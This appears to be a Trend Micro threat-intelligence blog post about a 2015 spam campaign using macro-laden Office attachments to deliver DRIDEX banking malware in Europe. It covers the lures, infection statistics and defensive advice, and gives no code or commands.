In 2015, we observed the increase of macro-based malware along with the spike in spam volume. BARTALEX macro malware, which arrived in spam emails containing attachments such as Microsoft Word document and Excel files, has hit enterprises last April. We’re currently monitoring another spam run laden with this macro malware that affected certain countries in Europe.
Macro malware, as we have seen throughout the past year or so, is experiencing a revival of sorts. Thought to have been banished in the early 2000s, macro malware is proving to everyone that old threats die hard.
What are macros?
Macros are a set of commands or code that are meant to help automate certain tasks, but recently the bad guys have yet again been utilizing this heavily to automate their malware-related tasks as well.
How do macro-related threats arrive?
We have observed that macro-based attacks often start with spammed messages. These spammed messages often use attention-grabbing topics, mostly related to finances. For this specific spam run that hit Europe, we saw that the messages were about remittance and invoice notifications.
What happens when the user opens the attachment?
For this spam run, we found that there were two possible outcomes that depend on the attachment.
Users who open the attachment may see instructions about enabling macros. The default security settings in Microsoft Word disable macros because of the possibility of them being exploited for malicious schemes.
Enabling macros triggers the execution of a malicious macro that’s encoded within the Word document. This macro connects to a specific URL to download a malicious VBScript which then downloads the final payload.
However, we have also seen attachments that when opened, appear like the one below.
For instances like this, nothing malicious occurs to the recipient’s computer. This is an example of a Base64 encrypted .DOC file sent as an email attachment. There seems to be a coding error while he attachment was being sent to its target recipients, resulting in this type of attachment. The malicious document can actually be extracted, but it will take considerable steps to do so.
What is the final payload?
For this spam run, DRIDEX variants are the final payload. DRIDEX is a malware family known for stealing personal information related to online banking through HTML injections. DRIDEX is considered to be the direct successor of online banking malware CRIDEX; it features new malicious routines as well as techniques to avoid detection.
Once installed and executed on an affected system, DRIDEX variants are capable of the following routines:
Browser screenshot taking
DRIDEX is known to target financial institutions in Europe, which is further established by the fact that this spam run is affecting users in the European region.
What makes this threat noteworthy?
By itself, macros are not harmful to the user. Its intended function is to automate frequently used tasks. The problem lies when cybercriminals abuse the functionalities of macro code to execute malicious routines.
This presents a problem to users who use macros regularly or even daily. This kind of user, once they receive a document with macro code, would not hesitate to enable the feature or even have the setting Enable all macros on– as it is common in some work environments to exchange files with macros.
Macro malware also poses a serious risk to users who have not heard of macros within the Microsoft Office suite. Unaware of the possible risks, and curious to open the file, these users may ignore the security warning and enable macros to view the document. After all, the file may contain items of interest since there were a lot of things to do before opening the file, and maybe the context of the email that came with had an intriguing message.
Aside from enticing messages, part of its social engineering tactic is the instruction to enable macros and the use of legitimate files like Excel and Microsoft, commonly used in enterprises for conducting their operations. As such, employees may be tricked into thinking that this is indeed a legitimate file thus executing the macro malware.
Who are affected by this spam run?
Based on feedback from the Trend Micro Smart Protection Network, the EMEA region is the most affected region, which has 92.5% of all affected computers.
In terms of affected countries, we have seen most threat-related activity in France (84.2%), followed by Japan (2.6%) and Italy (2.2%).
We also found that the top three affected industries are government, healthcare, and education. Given that the social engineering lures used were about remittances and invoices, employees from these industries may have opened the emails and attachments, assuming they were work-related.
What’s the impact of this threat to enterprises?
Apart from malware infection and possible information theft, the productivity of enterprises is also affected by the high volume of spam runs containing macro malware. It may disrupt business operations as it causes distractions to employees and IT departments, especially the Base64 samples that showed ASCII characters in the DOC file attachment.
Are Trend Micro users protected?
Addressing macro malware and all of its related threats requires multi-layered security solutions that can address each step of the way. Powered by the Smart Protection Network, Trend Micro solutions can detect and block multiple components of this threat through file reputation, web reputation, and email reputation technologies.
What can users do to prevent these threats from affecting their computers?
As we mentioned earlier, macros aren’t inherently malicious. However, we would like to recommend that users enable the macro security features of Microsoft Word. Be wary of any document that advises you to disable the macro security feature. It’s far better to err on the side of caution than risk your device’s security.
Since macro malware are often sent via email, security practices for email are a must. Double-check or verify each email, even those that come from known contacts, before opening them. Never open emails from unknown or unsolicited senders, even if the content seems to be important. Open attachments only if they can be verified.